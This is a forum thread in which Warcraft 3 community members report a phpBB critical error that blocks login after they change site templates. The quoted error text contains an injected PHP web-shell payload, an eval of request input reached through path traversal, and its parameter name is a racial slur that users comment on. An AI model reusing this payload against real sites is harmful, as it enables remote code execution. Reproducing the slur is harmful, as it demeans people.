• 🏆 Texturing Contest #33 is OPEN! Contestants must re-texture a SD unit model found in-game (Warcraft 3 Classic), recreating the unit into a peaceful NPC version. 🔗Click here to enter!

this may be similar to other topics

Status
Not open for further replies.
Level 1
im not sure whats going on i cant login with my normal account so i used this to post every time i try and keep getting this error message

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 421
File : /home/wc3sear.ch/html/includes/functions.php

Level 7
backup629 said:
im not sure whats going on i cant login with my normal account so i used this to post every time i try and keep getting this error message

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 421
File : /home/wc3sear.ch/html/includes/functions.php

Exactly the same sh** it said when it f***ed my old account up in spring. So yes, he changed the site template (man, that freaking problem should've been fixed, the staff has known it for about 6 months, and even though Darky is pretty inactive, he has checked the site within that period of time).

Level 7
@Whitey: yeah, it breaks wc3sear.ch's no racism rule. Blah, wc3sear.ch violates wc3sear.chs rules. Site deserves a warn :p

Level 7
Rui said:
That only uses to happen on submiting maps... I turn auto-login on anyway.

-Rui

Not true. It happpens when you change the site template in ya profile settings. When you have done that, all pages you try to view until you're automatically logged off will just be white with that 'nigga' error.

Status
Not open for further replies.